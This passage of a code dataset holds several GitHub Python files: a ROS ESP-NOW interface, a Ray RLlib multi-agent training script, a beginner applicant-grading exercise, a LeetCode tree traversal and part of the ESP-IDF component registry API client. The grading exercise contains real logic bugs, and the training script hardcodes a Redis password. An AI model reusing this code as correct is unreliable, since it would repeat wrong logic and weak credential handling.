debug=False):\n if not uri.startswith(\"mysql+pymysql://\"):\n raise ValueError(\"not for MySQL\")\n engine = create_engine(\n uri,\n encoding=\"utf-8\",\n paramstyle=\"pyformat\",\n isolation_level=\"READ COMMITTED\",\n echo=debug\n )\n return engine\n","repo_name":"xuecan/ganggu","sub_path":"ganggu/rdbms/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42220859406","text":"import struct\n\nimport rospy\n\nfrom esp_now_ros.msg import Packet\n\n\nclass ESPNOWROSInterface:\n def __init__(self, callback=None):\n self.raw_callback = callback\n self.sub = rospy.Subscriber(\"/esp_now_ros/recv\", Packet, self.callback)\n self.pub = rospy.Publisher(\"/esp_now_ros/send\", Packet, queue_size=1)\n\n def callback(self, msg):\n src_address = struct.unpack(\"6B\", msg.mac_address)\n data = msg.data\n if self.raw_callback is not None:\n self.raw_callback(src_address, data)\n\n def send(self, target_address, data, num_trial=1):\n \"\"\"\n Args:\n target_address (list of int)\n data (bytes)\n \"\"\"\n msg = Packet()\n msg.mac_address = struct.pack(\n \"6B\",\n target_address[0],\n target_address[1],\n target_address[2],\n target_address[3],\n target_address[4],\n target_address[5],\n )\n msg.data = data\n for _ in range(num_trial):\n self.pub.publish(msg)\n","repo_name":"sktometometo/esp_now_ros","sub_path":"python/esp_now_ros/esp_now_ros_interface.py","file_name":"esp_now_ros_interface.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"6726010980","text":"import os\nimport sys\nimport re\nimport shutil\nimport numpy as np\nimport ray\nimport glob\nimport pickle\nimport copy\nimport pandas as pd\nfrom datetime import datetime\nfrom subprocess import Popen, run\nfrom statistics import mean\nfrom math import ceil\nfrom dataclasses import dataclass\nfrom itertools import product, islice, cycle\nfrom typing import Dict, List, Tuple\nfrom ray.tune.logger import pretty_print\nfrom args import get_args\nfrom ray import tune\nfrom ray.rllib.agents import ppo\nfrom ray.tune.registry import register_env\n#from ray.tune.logger import NoopLogger\nfrom ray.rllib.policy.policy import PolicySpec\nfrom ray.rllib.agents.ppo.ppo_torch_policy import PPOTorchPolicy\nfrom ray.rllib.models.catalog import MODEL_DEFAULTS\nimport models\nfrom trade_v4 import Trade, TradeCallback, POLICY_MAPPING_FN\nfrom ray.tune.schedulers import PopulationBasedTraining\nfrom ray.rllib.agents.trainer import COMMON_CONFIG\nfrom ray.rllib.evaluation.metrics import collect_metrics\n\nimport random\nfrom DIRS import RESULTS_DIR\n\nclass ReusablePPOTrainer(ppo.PPOTrainer):\n def reset_config(self, new_config):\n self.cleanup()\n self.setup(new_config)\n return True\n\ndef policies_to_pops(policies:List[str]) -> List[List[str]]:\n pops = [[] for _ in range(args.food_types)]\n for pol in policies:\n try:\n f, a = re.match(r\"f(\\d+)a(\\d+)\", pol).groups()\n pops[int(f)].append(f\"f{f}a{a}\")\n except Exception as e:\n continue\n for pop in pops:\n pop.sort()\n return pops\n\n\ndef get(_worker, _attr):\n return ray.get(_worker.foreach_env.remote( lambda env: getattr(env, _attr)))\n\ndef timestamp():\n return str(datetime.now().replace(microsecond=0))\n\n\ndef all_vs_all(trainer, workerset):\n \"\"\"This function took a while to make.\n - Don't try and configure individual envs on a\n worker, you can only sample one episode at a time.\n - Don't try and change a worker env after you've called\n it, changing the env setting is complicated.\"\"\"\n print(f\"Running all_vs_all for timestamp {timestamp()}\")\n pops = policies_to_pops(list(trainer.config[\"multiagent\"][\"policies\"].keys()))\n matchups = [[a for pop in pops for a in pop]]\n workers = workerset.remote_workers()\n bin = ceil(len(matchups) / len(workers))\n worker_matchups = [matchups[m:m+bin] for m in range(0, len(matchups), bin)]\n futures = []\n agents_in_matchups = list(set([a for wm in worker_matchups for m in wm for a in m]))\n\n render_dir = os.path.join(EXP_DIR, f\"outs-{timestamp()}\")\n os.path.isdir(render_dir) or os.mkdir(render_dir)\n # Give each worker all matchups it needs to run\n for i, w in enumerate(workers):\n # print(f\"Running {worker_matchups[i]} on worker_{i}...\")\n if i >= len(worker_matchups):\n break\n ray.get(w.foreach_env.remote(\n lambda env: env.set_matchups(worker_matchups[i])))\n\n ray.get(w.foreach_env_with_context.remote(\n lambda env, ctx: env.set_render_path(render_dir+f\"/{ctx.vector_index}-\")))\n\n\n for _ in worker_matchups[i]:\n futures.append(w.sample.remote())\n\n\n batches = ray.get(futures)\n metrics = collect_metrics(workerset.local_worker(), workerset.remote_workers(), timeout_seconds=999999)\n os.listdir(render_dir) or os.rmdir(render_dir)\n #assert == len(metrics[\"policy_reward_mean\"])\n if len(metrics[\"policy_reward_mean\"]) != len(agents_in_matchups):\n print(f\"agents in matchup: {agents_in_matchups}\")\n print(f\"Returned: {metrics['policy_reward_mean']}\")\n assert len(metrics[\"policy_reward_mean\"]) == len(agents_in_matchups)\n assert len(metrics[\"policy_reward_mean\"]) == len(trainer.config[\"multiagent\"][\"policies\"])\n return metrics\n\n\ndef add_pol(pop: int):\n config[\"env_config\"][\"latest_agent_ids\"][pop] += 1\n pol_id = config[\"env_config\"][\"latest_agent_ids\"][pop]\n pol_name = f\"f{pop}a{pol_id}\"\n\n #print(f\"Adding {pol_name}\")\n config[\"multiagent\"][\"policies\"][pol_name] = pol_spec\n trainer.add_policy(pol_name,\n PPOTorchPolicy,\n policy_mapping_fn=policy_mapping_fn,\n policies_to_train=list(config[\"multiagent\"][\"policies\"].keys()),\n config=config)\n return pol_name\n\n\ndef add_pol_by_name(pop: int, name: str):\n pop, a = re.match(r\"f(\\d+)a(\\d+)\", name).groups()\n config[\"env_config\"][\"latest_agent_ids\"][int(pop)] = max(\n config[\"env_config\"][\"latest_agent_ids\"][int(pop)], int(a))\n\n #print(f\"Adding {pol_name}\")\n config[\"multiagent\"][\"policies\"][name] = pol_spec\n trainer.add_policy(name,\n PPOTorchPolicy,\n policy_mapping_fn=policy_mapping_fn,\n policies_to_train=list(config[\"multiagent\"][\"policies\"].keys()),\n config=config)\n return name\n\ndef rm_pol(pol_name: str):\n #print(f\"Removing {pol_name}\")\n config[\"multiagent\"][\"policies\"].pop(pol_name)\n trainer.remove_policy(pol_name,\n policy_mapping_fn=POLICY_MAPPING_FN,\n policies_to_train=list(config[\"multiagent\"][\"policies\"].keys()))\n\ndef add_row(df, result):\n new_row = pd.DataFrame(result[\"custom_metrics\"], index=[1])\n for stat in [\"min\", \"max\", \"mean\"]:\n met = f\"episode_reward_{stat}\"\n new_row[met] = result[met]\n return pd.concat([df, new_row], ignore_index=True, sort=False)\n\ndef save(trainer, path):\n # make a list of all previous checkpoints\n prev_checks = []\n for f in glob.glob(f\"{os.path.join(path, '*')}\"):\n if re.match(\".*checkpoint-(\\d+)\", f):\n prev_checks.append(f)\n \n trainer.save_checkpoint(path)\n with open(os.path.join(path, \"policies.p\"), \"wb\") as f:\n pickle.dump(list(trainer.config[\"multiagent\"][\"policies\"].keys()), f)\n # delete previous checkpoints\n for f in prev_checks:\n os.remove(f)\n\ndef load(trainer, path):\n print(\"Loading checkpoint from\", path)\n global policies, results_df, RESULT_FILE\n results_df = pd.DataFrame()\n if os.path.exists(RESULT_FILE):\n results_df = pd.read_csv(RESULT_FILE)\n\n check = -1\n newest_checkpoint = \"\"\n for f in glob.glob(f\"{os.path.join(path, '*')}\"):\n m = re.match(\".*checkpoint-(\\d+)\", f)\n if m:\n new_check = int(m.groups()[0])\n if new_check > check:\n check = new_check\n newest_checkpoint = f\n check_path = os.path.join(path, newest_checkpoint)\n\n if newest_checkpoint:\n\n assert new_check > 0\n print(f\"Restoring from {check_path}\")\n for pol in policies.copy().keys():\n print(f\"Removing {pol}\")\n rm_pol(pol)\n with open(os.path.join(path,\"policies.p\"), \"rb\") as f:\n saved_pols = pickle.load(f)\n assert len(saved_pols) > 1\n for pol in saved_pols:\n print(f\"Adding {pol}\")\n add_pol_by_name(trainer, pol)\n\n trainer.reset_config(config)\n trainer.load_checkpoint(check_path)\n trainer._iteration = new_check\n loaded_pops = policies_to_pops(saved_pols)\n assert all(len(pop) > 0 for pop in loaded_pops)\n matchups = [[a for pop in pops for a in pop]]\n assert len(matchups) > 0\n print(\"Setting matchups\", matchups)\n\n for w in trainer.workers.remote_workers():\n w.foreach_env.remote(\n lambda env: env.set_matchups(matchups))\n\n\nif __name__ == \"__main__\":\n\n args = get_args()\n CLASS_DIR = os.path.join(RESULTS_DIR, f\"{args.class_name}\")\n os.path.exists(CLASS_DIR) or os.mkdir(CLASS_DIR)\n\n EXP_DIR = os.path.join(CLASS_DIR, f\"{args.name}\")\n os.path.exists(EXP_DIR) or os.mkdir(EXP_DIR)\n\n RESULT_FILE=os.path.join(EXP_DIR,\"results.txt\")\n EVAL_FILE = os.path.join(EXP_DIR, \"eval.csv\")\n\n\n\n pops = [[f\"f{f}a{a}\" for a in range(args.pop_size//args.food_types)] for f in range(args.food_types)]\n matchups = [[a for pop in pops for a in pop]]\n env_config = {\"window\": (args.window, args.window),\n \"grid\": (args.gx, args.gy),\n \"food_types\": 2,\n \"latest_agent_ids\": [(args.pop_size//args.food_types)-1 for _ in range(args.food_types)],\n \"matchups\": matchups,\n \"episode_length\": args.episode_length,\n \"fire_radius\": args.fire_radius,\n \"move_coeff\": args.move_coeff,\n \"no_multiplier\": args.no_multiplier,\n \"num_piles\": args.num_piles,\n \"dist_coeff\": args.dist_coeff,\n \"caps\": args.caps,\n \"ineq_coeff\": args.ineq_coeff,\n \"death_prob\": args.death_prob,\n \"twonn_coeff\": args.twonn_coeff,\n \"pickup_coeff\": args.pickup_coeff,\n \"share_health\": args.share_health,\n \"respawn\": args.respawn,\n \"fires\": [(args.fires[i], args.fires[i+1]) for i in range(0, len(args.fires), 2)],\n \"foods\": [(*args.foods[i:i+3],) for i in range(0, len(args.foods), 3)],\n \"survival_bonus\": args.survival_bonus,\n \"health_baseline\": args.health_baseline,\n \"punish\": args.punish,\n \"spawn_agents\": args.spawn_agents,\n \"spawn_food\": args.spawn_food,\n \"light_coeff\": args.light_coeff,\n \"punish_coeff\": args.punish_coeff,\n \"food_agent_start\": args.food_agent_start,\n \"food_env_spawn\": args.food_env_spawn,\n \"day_night_cycle\": args.day_night_cycle,\n \"night_time_death_prob\": args.night_time_death_prob,\n \"day_steps\": args.day_steps,\n \"policy_mapping_fn\": POLICY_MAPPING_FN,\n \"vocab_size\": 0}\n\n test_env = Trade(env_config)\n obs_space = test_env.observation_space\n act_space = test_env.action_space\n\n pol_config = {\n \"model\": getattr(models, args.model),\n \"gamma\": 0.99,\n }\n pol_spec = PolicySpec(None, obs_space, act_space, pol_config)\n\n policies = {pol: pol_spec for pop in pops for pol in pop}\n policy_mapping_fn = POLICY_MAPPING_FN\n\n env_name = \"trade_v4\"\n\n batch_size = args.batch_size\n config={\n # Environment specific\n \"env\": env_name,\n \"env_config\": env_config,\n \"callbacks\": TradeCallback,\n \"recreate_failed_workers\": True,\n \"log_level\": \"ERROR\",\n \"framework\": \"torch\",\n \"horizon\": args.episode_length * args.num_agents,\n \"num_gpus\": 1,\n \"evaluation_config\": {\n \"env_config\": {\"agents\": matchups[0]},\n \"explore\": False\n },\n \"evaluation_duration\": 10, # make this number of envs per worker\n \"evaluation_num_workers\" : 4,\n \"num_workers\": 4,\n \"custom_eval_function\": all_vs_all,\n\n \"num_cpus_per_worker\": 2,\n \"num_envs_per_worker\": 10,\n \"batch_mode\": 'truncate_episodes',\n \"lambda\": 0.95,\n \"gamma\": .99,\n \"model\": pol_config[\"model\"],\n \"clip_param\": 0.03,\n \"entropy_coeff\": args.entropy_coeff,\n 'vf_loss_coeff': 0.25,\n \"num_sgd_iter\": 5,\n \"sgd_minibatch_size\": batch_size,\n \"train_batch_size\": batch_size,\n 'rollout_fragment_length': 50,\n 'lr': args.learning_rate,\n # Method specific\n \"multiagent\": {\n \"policies\": policies,\n \"policy_mapping_fn\": policy_mapping_fn,\n },\n \"logger_config\": {\n \"type\": \"ray.tune.logger.NoopLogger\",\n\n }}\n\n pbt_interval = args.checkpoint_interval if args.pbt else 10_000_000_000_000\n print(config)\n \n\n\n print(\"SPAWNING RAY\")\n if args.ip:\n ray.init(address=args.ip, _redis_password=\"longredispassword\")\n\n print(\"REGISTER_ENV\")\n register_env(env_name, lambda config: Trade(config))\n env = Trade(env_config)\n \n print(\"MAKE TRAINER\")\n trainer = ReusablePPOTrainer(config=config, env=Trade)\n\n print(\"BEGINNING LOOP\")\n load(trainer, EXP_DIR)\n\n def run_training():\n global results_df\n prev_result = {'custom_metrics': {}}\n i = 0\n while True:\n i += 1\n for j in range(40*(args.pop_size)):\n print(\"Training\")\n result = trainer.train()\n print(\"Trained\")\n # trainer.train() returns a result with the same custom_metric dict\n # if no new episodes were completed. in this case, skip logging.\n if not result[\"custom_metrics\"] or result[\"custom_metrics\"] == prev_result['custom_metrics']:\n print(\"Skipping no new results\")\n continue\n\n print(\"Writing results\")\n result[\"custom_metrics\"][\"step\"] = trainer._iteration\n results_df = add_row(results_df, result)\n # we remove the step from the custom_metrics dict so that\n # we can skip equal results\n del result[\"custom_metrics\"][\"step\"]\n prev_result = result\n\n tmp_result_file = RESULT_FILE+\"-tmp\"\n results_df.round(2).to_csv(tmp_result_file, index=False)\n run(f\"mv -f {tmp_result_file} {RESULT_FILE}\".split())\n\n eval_mets = trainer.evaluate()\n eval_mets[\"evaluation\"][\"custom_metrics\"][\"step\"] = trainer._iteration\n eval_df = pd.DataFrame.from_dict(eval_mets['evaluation'][\"custom_metrics\"], orient=\"index\").T\n eval_df.round(2).to_csv(EVAL_FILE, mode='a', header=(not os.path.exists(EVAL_FILE)), index=False)\n print(eval_mets)\n\n if i % 20 == 0:\n print(f\"Saving trainer for timestamp {timestamp()}\")\n save(trainer, EXP_DIR)\n\n\n def run_interactive():\n obss = test_env.reset()\n test_env.render_interactive()\n states = {}\n for agent in test_env.agents:\n policy = trainer.get_policy(agent)\n states[agent] = policy.get_initial_state()\n\n for i in range(400):\n actions = {}\n for agent in obss.keys():\n policy = trainer.get_policy(agent)\n actions[agent], states[agent], logits = policy.compute_single_action(obs=np.array(obss[agent]), state=states[agent], policy_id=agent)\n # override agent action with custom input if specified\n act = input(f'act for {test_env.agents.index(agent)}:')\n # only process first char\n if len(act) > 1:\n act = act[0]\n # map udlr to vim keys\n vim=\"k j h l\".split()\n if act in vim:\n act = vim.index(act)\n if act != \"\":\n actions[agent] = int(act)\n\n obss, rews, dones, infos = test_env.step({agent: action for agent, action in actions.items() if not test_env.compute_done(agent)})\n test_env.render_interactive()\n if dones[\"__all__\"]:\n print(\"--------FINAL-STEP--------\")\n #test_env.render()\n print(\"game over\")\n break\n if args.interactive:\n run_interactive()\n else:\n run_training()\n","repo_name":"jarbus/trade","sub_path":"evo.py","file_name":"evo.py","file_ext":"py","file_size_in_byte":15054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32277826022","text":"#Título\nprint(\"Postulantes a un empleo\\n\")\n\n#Carga de datos\ncant_preguntas = int(input(\"Ingrese el número de preguntas realizadas: \"))\npostulante_1 = input(\"Ingrese el nombre del 1º postulante: \")\nnro_correcta_1 = int(input(\"Ingrese la cantidad de respuestas correctas: \"))\npostulante_2 = input(\"Ingrese el nombre del 2º postulante: \")\nnro_correcta_2 = int(input(\"Ingrese la cantidad de respuestas correctas: \"))\npostulante_3 = input(\"Ingrese el nombre del 3º postulante: \")\nnro_correcta_3 = int(input(\"Ingrese la cantidad de respuestas correctas: \"))\nprint(\"\")\n\n#Procesos\nporcent_1 = nro_correcta_1 * (100/cant_preguntas)\nporcent_2 = nro_correcta_2 * (100/cant_preguntas)\nporcent_3 = nro_correcta_3 * (100/cant_preguntas)\n\nif porcent_1 >= 90:\n nivel_1 = \"Nivel Superior\"\nelif 75 <= porcent_1 < 90:\n nivel_1 = \"Nivel Medio\"\nelif 50 <= porcent_1 < 75:\n nivel_1 = \"Nivel Regular\"\nelse:\n nivel_1 = \"Fuera de Nivel\"\n\nif porcent_1 >= 90:\n nivel_2 = \"Nivel Superior\"\nelif 75 <= porcent_2 < 90:\n nivel_2 = \"Nivel Medio\"\nelif 50 <= porcent_2 < 75:\n nivel_2 = \"Nivel Regular\"\nelse:\n nivel_2 = \"Fuera de Nivel\"\n\nif porcent_3 >= 90:\n nivel_3 = \"Nivel Superior\"\nelif 75 <= porcent_3 < 90:\n nivel_3 = \"Nivel Medio\"\nelif 50 <= porcent_3 < 75:\n nivel_3 = \"Nivel Regular\"\nelse:\n nivel_3 = \"Fuera de Nivel\"\n\nprint(postulante_1 + \": \", nivel_1)\nprint(postulante_2 + \": \", nivel_2)\nprint(postulante_3 + \": \", nivel_3)\n\nmax_porcent = max(porcent_1, porcent_2, porcent_3)\nganador = postulante_1\n\nif max_porcent == porcent_2:\n ganador = postulante_2\nelif max_porcent == porcent_3:\n ganador = postulante_3\n\n print(\"\\nGanador del puesto:\", ganador)","repo_name":"BrisaDiaz/utn-python","sub_path":"ficha-5/ficha-5-ej-13.py","file_name":"ficha-5-ej-13.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38213676793","text":"student_attendance = {\"Pedro\": 96, \"João\": 100, \"Maria\": 89}\n\nfor student, attendance in student_attendance.items():\n print(f\"{student}: {attendance}\")\n\nprint()\nprint(student_attendance.items())\n\n*head, tail = [1, 2, 3, 4, 5, 6]\nprint(head)\nprint(tail)\n\nprimeiro, *ultimos = [1, 2, 3, 4, 5, 6]\nprint(primeiro)\nprint(ultimos)\n\n\nstudents = [\n {'name': 'Jose', 'school': 'Computing', 'grades': (66, 77, 88)},\n {'name': 'Amado', 'school': 'Computing', 'grades': (56, 67, 78)},\n {'name': 'Batista', 'school': 'Computing', 'grades': (100, 89, 91)},\n {'name': 'Terezo', 'school': 'Computing', 'grades': (86, 81, 91)}\n\n]\n\n\ndef average_grade_all_students(student_list):\n total = 0\n count = 0\n for student in student_list:\n total += sum(student['grades'])\n count += len(student['grades'])\n return total / count\n\n\nprint(average_grade_all_students(students))\n","repo_name":"pivotostes/restAPIwithFlask","sub_path":"src/24_Destructuring_variables/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9844094889","text":"\"\"\"\nleft -> right\ntop -> bottom\n\n解题思路:\n- level:0, if len(L) == level 说明可以新建一个层级放数据\n- self.L[level].append(node.val)\n\n- node.left 重复调用处理, 唯一不同的是level+1\n- node.right 重复调用处理, 唯一不同的是level+1\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def __init__(self):\n self.L = []\n\n def levelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n if root is None:\n return []\n\n def traverse(node, level):\n # 从1层开始, 初始化创建个新的\n if len(self.L) == level:\n self.L.append([])\n self.L[level].append(node.val)\n\n if node.left:\n traverse(node.left, level + 1)\n if node.right:\n traverse(node.right, level + 1)\n\n traverse(root, 0)\n return self.L","repo_name":"Linjiayu6/LeetCode","sub_path":"Algorithms/tree/fundamentals/levelorder_traverse.py","file_name":"levelorder_traverse.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39001101571","text":"import os\nimport platform\nimport re\nfrom collections import namedtuple\nfrom functools import wraps\nfrom io import open\n\nimport requests\nfrom cachecontrol import CacheControlAdapter\nfrom cachecontrol.caches import FileCache\nfrom cachecontrol.heuristics import ExpiresAfter\nfrom requests.adapters import HTTPAdapter\nfrom requests_file import FileAdapter\nfrom requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor\nfrom schema import Schema, SchemaError\nfrom tqdm import tqdm\n\n# Import whole module to avoid circular dependencies\nimport idf_component_tools as tools\nfrom idf_component_tools.__version__ import __version__\nfrom idf_component_tools.environment import detect_ci, getenv_int\nfrom idf_component_tools.file_cache import FileCache as ComponentFileCache\nfrom idf_component_tools.messages import warn\nfrom idf_component_tools.semver import SimpleSpec, Version\n\nfrom .api_client_errors import (\n KNOWN_API_ERRORS,\n APIClientError,\n ComponentNotFound,\n NetworkConnectionError,\n NoRegistrySet,\n StorageFileNotFound,\n VersionNotFound,\n)\nfrom .api_schemas import (\n API_INFORMATION_SCHEMA,\n API_TOKEN_SCHEMA,\n COMPONENT_SCHEMA,\n ERROR_SCHEMA,\n TASK_STATUS_SCHEMA,\n VERSION_UPLOAD_SCHEMA,\n)\nfrom .manifest import BUILD_METADATA_KEYS, Manifest\n\ntry:\n from typing import TYPE_CHECKING, Any, Callable\n\n if TYPE_CHECKING:\n from idf_component_tools.sources import BaseSource\nexcept ImportError:\n pass\n\nTaskStatus = namedtuple('TaskStatus', ['message', 'status', 'progress', 'warnings'])\n\nDEFAULT_TIMEOUT = (6.05, 30.1) # Connect timeout # Read timeout\n\nDEFAULT_API_CACHE_EXPIRATION_MINUTES = 0\nMAX_RETRIES = 3\n\n\ndef env_cache_time():\n try:\n return getenv_int(\n 'IDF_COMPONENT_API_CACHE_EXPIRATION_MINUTES',\n DEFAULT_API_CACHE_EXPIRATION_MINUTES,\n )\n except ValueError:\n warn(\n 'IDF_COMPONENT_API_CACHE_EXPIRATION_MINUTES is set to a non-numeric value. '\n 'Please set the variable to the number of minutes. Disabling caching.'\n )\n return DEFAULT_API_CACHE_EXPIRATION_MINUTES\n\n\ndef create_session(\n cache=False, # type: bool\n cache_path=None, # type: str | None\n cache_time=None, # type: int | None\n token=None, # type: str | None\n): # type: (...) -> requests.Session\n if cache_path is None:\n cache_path = ComponentFileCache().path()\n\n cache_time = cache_time or env_cache_time()\n if cache and cache_time:\n api_adapter = CacheControlAdapter(\n max_retries=MAX_RETRIES,\n heuristic=ExpiresAfter(minutes=cache_time),\n cache=FileCache(os.path.join(cache_path, '.api_client')),\n )\n else:\n api_adapter = HTTPAdapter(max_retries=MAX_RETRIES)\n\n session = requests.Session()\n session.headers['User-Agent'] = user_agent()\n session.auth = TokenAuth(token)\n\n session.mount('http://', api_adapter)\n session.mount('https://', api_adapter)\n session.mount('file://', FileAdapter())\n\n return session\n\n\ndef filter_versions(\n versions, version_filter, component_name\n): # type: (list[dict], str, str) -> list[dict]\n if version_filter and version_filter != '*':\n requested_version = SimpleSpec(str(version_filter))\n filtered_versions = [v for v in versions if requested_version.match(Version(v['version']))]\n\n if not filtered_versions or not any([bool(v.get('yanked_at')) for v in filtered_versions]):\n return filtered_versions\n\n clause = requested_version.clause.simplify()\n # Some clauses don't have an operator attribute, need to check\n if (\n hasattr(clause, 'operator')\n and clause.operator == '=='\n and filtered_versions[0]['yanked_at']\n ):\n warn(\n 'The version \"{}\" of the \"{}\" component you have selected has '\n 'been yanked from the repository due to the following reason: \"{}\". '\n 'We recommend that you update to a different version. '\n 'Please note that continuing to use a yanked version can '\n 'result in unexpected behavior and issues with your project.'.format(\n clause.target,\n component_name.lower(),\n filtered_versions[0]['yanked_message'],\n )\n )\n else:\n filtered_versions = [v for v in filtered_versions if not v.get('yanked_at')]\n else:\n filtered_versions = [v for v in versions if not v.get('yanked_at')]\n\n return filtered_versions\n\n\nclass ComponentDetails(Manifest):\n def __init__(\n self,\n download_url=None, # type: str | None # Direct url for tarball download\n documents=None, # type: list[dict[str, str]] | None # List of documents of the component\n license=None, # type: dict[str, str] | None # Information about license\n examples=None, # type: list[dict[str, str]] | None # List of examples of the component\n *args,\n **kwargs\n ):\n super(ComponentDetails, self).__init__(*args, **kwargs)\n self.download_url = download_url\n self.documents = documents\n self.license = license # type: ignore\n self.examples = examples\n\n\ndef handle_4xx_error(error): # type: (requests.Response) -> str\n try:\n json = ERROR_SCHEMA.validate(error.json())\n name = json['error']\n messages = json['messages']\n except SchemaError as e:\n raise APIClientError(\n 'API Endpoint \"{}: returned unexpected error description:\\n{}'.format(error.url, str(e))\n )\n except ValueError:\n raise APIClientError('Server returned an error in unexpected format')\n\n exception = KNOWN_API_ERRORS.get(name, APIClientError)\n if isinstance(messages, list):\n raise exception('\\n'.join(messages))\n else:\n raise exception(\n 'Error during request:\\n{}\\nStatus code: {} Error code: {}'.format(\n str(messages), error.status_code, name\n )\n )\n\n\ndef join_url(*args): # type: (*str) -> str\n \"\"\"\n Joins given arguments into an url and add trailing slash\n \"\"\"\n parts = [part[:-1] if part and part[-1] == '/' else part for part in args]\n return '/'.join(parts)\n\n\ndef auth_required(f):\n @wraps(f)\n def wrapper(self, *args, **kwargs):\n if not self.auth_token:\n raise APIClientError('API token is required')\n return f(self, *args, **kwargs)\n\n return wrapper\n\n\nclass TokenAuth(requests.auth.AuthBase):\n def __init__(self, token): # type: (str | None) -> None\n self.token = token\n\n def __call__(self, request):\n if self.token:\n request.headers['Authorization'] = 'Bearer %s' % self.token\n return request\n\n\ndef user_agent(): # type: () -> str\n \"\"\"\n Returns user agent string.\n \"\"\"\n\n environment_info = [\n '{os}/{release} {arch}'.format(\n os=platform.system(), release=platform.release(), arch=platform.machine()\n ),\n 'python/{version}'.format(version=platform.python_version()),\n ]\n\n ci_name = detect_ci()\n if ci_name:\n environment_info.append('ci/{}'.format(ci_name))\n\n user_agent = 'idf-component-manager/{version} ({env})'.format(\n version=__version__,\n env='; '.join(environment_info),\n )\n\n return user_agent\n\n\ndef _component_request(request, component_name):\n \"\"\"Get component information from storage. Used by `versions` and `component`.\"\"\"\n try:\n return request('get', ['components', component_name.lower()], schema=COMPONENT_SCHEMA)\n except StorageFileNotFound:\n raise ComponentNotFound('Component \"{}\" not found'.format(component_name))\n\n\nclass APIClient(object):\n def __init__(self, base_url=None, storage_url=None, source=None, auth_token=None):\n # type: (str | None, str | None, BaseSource | None, str | None) -> None\n self.base_url = base_url\n self._storage_url = storage_url\n self._frontend_url = None\n self.source = source\n self.auth_token = auth_token\n\n def _version_dependencies(self, version):\n dependencies = []\n for dependency in version.get('dependencies', []):\n # Support only idf and service sources\n if dependency['source'] == 'idf':\n source = tools.sources.IDFSource({})\n else:\n source = self.source or tools.sources.WebServiceSource({})\n\n is_public = dependency.get('is_public', False)\n require = dependency.get('require', True)\n require_string = 'public' if is_public else ('private' if require else 'no')\n\n dependencies.append(\n tools.manifest.ComponentRequirement(\n name='{}/{}'.format(dependency['namespace'], dependency['name']),\n version_spec=dependency['spec'],\n source=source,\n public=is_public,\n require=require_string,\n optional_requirement=tools.manifest.OptionalRequirement.fromdict(dependency),\n )\n )\n\n return tools.manifest.filter_optional_dependencies(dependencies)\n\n def _base_request(\n self,\n url, # type: str\n session, # type: requests.Session\n method, # type: str\n path, # type: list[str]\n data=None, # type: dict | None\n json=None, # type: dict | None\n headers=None, # type: dict | None\n schema=None, # type: Schema | None\n use_storage=False, # type: bool\n ):\n # type: (...) -> dict\n endpoint = join_url(url, *path)\n\n timeout = DEFAULT_TIMEOUT # type: float | tuple[float, float]\n try:\n timeout = float(os.environ['IDF_COMPONENT_SERVICE_TIMEOUT'])\n except ValueError:\n raise APIClientError(\n 'Cannot parse IDF_COMPONENT_SERVICE_TIMEOUT. It should be a number in seconds.'\n )\n except KeyError:\n pass\n\n try:\n response = session.request(\n method,\n endpoint,\n data=data,\n json=json,\n headers=headers,\n timeout=timeout,\n allow_redirects=True,\n )\n\n if response.status_code == 204: # NO CONTENT\n return {}\n elif 400 <= response.status_code < 500:\n if use_storage:\n if response.status_code == 404:\n raise StorageFileNotFound()\n raise APIClientError(\n 'Error during request.\\nStatus code: {}'.format(response.status_code)\n )\n\n handle_4xx_error(response)\n\n elif 500 <= response.status_code < 600:\n raise APIClientError(\n 'Internal server error happended while processing '\n 'requrest to:\\n{}\\nStatus code: {}'.format(endpoint, response.status_code)\n )\n\n response_json = response.json()\n except requests.exceptions.ConnectionError as e:\n raise NetworkConnectionError(str(e))\n except requests.exceptions.RequestException:\n raise APIClientError('HTTP request error')\n\n try:\n if schema is not None:\n schema.validate(response_json)\n except SchemaError as e:\n raise APIClientError(\n 'API Endpoint \"{}: returned unexpected JSON:\\n{}'.format(endpoint, str(e))\n )\n\n except (ValueError, KeyError, IndexError):\n raise APIClientError('Unexpected component server response')\n\n return response_json\n\n @property\n def storage_url(self):\n if not self._storage_url:\n self._storage_url = self.api_information()['components_base_url']\n return self._storage_url\n\n @property\n def frontend_url(self):\n if not self._frontend_url:\n self._frontend_url = re.sub(r'/api/?$', '', self.base_url)\n\n return self._frontend_url\n\n def _request(cache=False, use_storage=False): # type: (APIClient | bool, bool) -> Callable\n def decorator(f): # type: (Callable[..., Any]) -> Callable\n @wraps(f) # type: ignore\n def wrapper(self, *args, **kwargs):\n url = self.base_url\n if use_storage:\n url = self.storage_url\n\n if url is None:\n raise NoRegistrySet(\n 'The current operation requires access to the IDF component registry. '\n 'However, the registry URL is not set. You can set the '\n 'IDF_COMPONENT_REGISTRY_URL environment variable or \"registry_url\" field '\n 'for your current profile in \"idf_component_manager.yml\" file. '\n 'To use the default IDF component registry '\n 'unset IDF_COMPONENT_STORAGE_URL environment variable or remove '\n '\"storage_url\" field from the \"idf_component_manager.yml\" file'\n )\n\n session = create_session(cache=cache, token=self.auth_token)\n\n def request(method, path, data=None, json=None, headers=None, schema=None):\n if use_storage:\n path[-1] += '.json'\n return self._base_request(\n url,\n session,\n method,\n path,\n data=data,\n json=json,\n headers=headers,\n schema=schema,\n use_storage=use_storage,\n )\n\n return f(self, request=request, *args, **kwargs)\n\n return wrapper\n\n return decorator\n\n @_request(cache=True)\n def 